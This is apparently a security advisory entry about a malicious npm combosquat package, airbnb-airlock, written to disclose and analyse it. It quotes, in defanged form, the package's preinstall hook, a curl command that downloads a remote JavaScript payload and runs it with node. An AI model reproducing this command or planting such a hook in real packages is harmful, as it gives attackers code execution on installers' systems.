LWA-2026-5866 MAL-2026-6293 ↗ confirmed malware

airbnb-airlock@99.0.0

Malicious code in airbnb-airlock (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071.001 · Web Protocols

Analysis

A combosquat package impersonating Airbnb's naming scheme (airbnb-airlock). The package contains no functional code — only a package.json declaring a preinstall lifecycle hook that runs 'curl hxxps://poc[.]amanrawat[.]com/hehe[.]js -o index.js && node index.js'. On npm install, this downloads a remote JavaScript payload from poc[.]amanrawat[.]com and executes it with Node.js, giving the attacker arbitrary code execution on the installer's system.

analyzed by
Leitwacht
first seen
Jun 23, 2026, 09:33 AM
analyzed
Jun 23, 2026, 09:33 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.